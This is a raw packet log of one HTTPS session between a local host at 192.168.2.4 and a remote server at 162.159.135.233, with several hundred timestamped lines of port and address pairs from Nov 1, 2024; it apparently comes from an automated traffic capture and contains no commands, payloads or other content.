                                            Nov 1, 2024 06:22:03.798511982 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.798552990 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.798557997 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.798574924 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.798949003 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.798963070 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.799010038 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.799015999 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.799052000 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.799401999 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.799420118 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.799454927 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.799459934 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.799488068 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.800003052 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800014973 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800060034 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.800065041 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800076008 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.800538063 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800555944 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800595045 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.800601006 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.800612926 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801064014 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801076889 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801122904 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801126957 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801145077 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801445007 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801461935 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801496029 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801501036 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801534891 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801871061 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801883936 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801923990 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.801929951 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.801956892 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.802459955 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.802478075 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.802519083 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.802522898 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.802550077 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.802963018 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.802978039 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.803014040 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.803018093 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.803042889 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.803525925 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.803544044 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.803580046 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.803585052 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.803612947 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.804024935 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804044962 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804095984 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.804101944 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804112911 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.804461956 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804480076 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804513931 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.804521084 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.804550886 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.805010080 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805027008 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805067062 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.805072069 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805102110 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.805576086 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805622101 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805653095 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.805656910 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.805699110 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806003094 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806020021 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806080103 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806085110 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806093931 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806371927 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806391001 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806425095 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806431055 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806454897 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806771040 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806783915 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806824923 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.806828976 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.806855917 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.903225899 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.916616917 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.916635036 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.916727066 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.916742086 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.916882038 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.917181969 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917201042 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917251110 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.917256117 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917278051 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.917290926 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.917736053 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917752028 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917802095 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.917809010 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.917880058 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918365002 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918390036 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918437004 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918441057 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918457031 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918479919 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918864965 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918880939 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918924093 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918930054 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.918962002 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.918971062 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.919461012 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919476986 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919533968 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.919540882 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919904947 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919923067 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919961929 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.919967890 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.919981956 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.920023918 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.920322895 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920339108 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920401096 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.920408964 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920545101 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.920890093 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920912981 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920964956 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.920969963 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.920995951 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921009064 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921375036 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.921391964 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.921435118 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921438932 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.921475887 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921489000 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921891928 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.921911001 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.921971083 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.921976089 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.922003031 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.922009945 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.922446966 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.922462940 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.922516108 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.922521114 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.922954082 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.922971964 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923007011 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923012018 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923042059 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923063040 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923424959 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923439026 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923486948 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923491001 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923511028 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923527002 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923924923 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923939943 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.923979998 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.923985958 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924015999 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924026012 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924442053 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924455881 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924499035 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924504995 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924532890 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924551010 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924818039 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924839020 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924871922 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924877882 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.924907923 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.924921036 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925192118 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925206900 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925249100 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925254107 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925278902 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925297022 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925611019 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925626993 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925672054 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925676107 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.925704002 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925721884 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.925993919 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.926011086 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.926052094 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.926058054 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:03.926084042 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.926095963 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:03.929528952 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.035629034 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.035650969 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.035686970 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.035696983 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.035708904 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.035758018 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036164045 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036186934 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036216021 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036221027 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036246061 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036264896 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036799908 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036813974 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036848068 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036851883 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.036869049 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.036885977 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.037441969 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.037461042 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.037516117 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.037520885 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.037590981 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.037926912 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.037941933 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.037981987 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.037985086 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038019896 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038028955 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038393021 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038417101 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038444042 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038449049 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038475990 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038486004 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038816929 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038830996 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038868904 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038872957 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038897991 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038906097 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038927078 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038940907 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.038976908 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.038980961 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039006948 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039015055 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039122105 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039134979 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039171934 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039175987 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039205074 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039216042 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039247036 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039262056 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039292097 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039297104 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039319992 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039326906 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039638042 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039652109 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039699078 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039704084 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.039726973 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.039752960 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040088892 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040101051 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040143013 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040177107 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040180922 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040219069 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040287018 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040299892 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040334940 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040339947 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040369987 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040378094 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040488958 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040503979 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040546894 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040551901 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040575981 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040581942 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040911913 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040925026 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040965080 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.040968895 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.040994883 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041022062 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041104078 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041119099 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041157961 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041162968 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041187048 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041204929 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041652918 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041668892 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041728973 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041733980 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.041760921 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.041769981 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042043924 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042057991 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042109013 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042113066 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042139053 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042148113 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042198896 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042217970 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042263031 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042267084 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042289972 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042435884 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042455912 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042478085 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042478085 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042486906 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.042520046 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.042531013 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.153841019 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.153857946 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.153913021 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.153923988 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.153934956 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.154134035 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.154448986 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.154463053 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.154501915 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.154505968 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.154536009 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.154547930 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155090094 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155102968 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155149937 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155154943 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155179024 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155190945 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155642986 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155662060 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155697107 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155702114 CET44349732162.159.135.233192.168.2.4
                                            Nov 1, 2024 06:22:04.155726910 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.155739069 CET49732443192.168.2.4162.159.135.233
                                            Nov 1, 2024 06:22:04.156094074 CET44349732162.159.135.233192.168.2.4
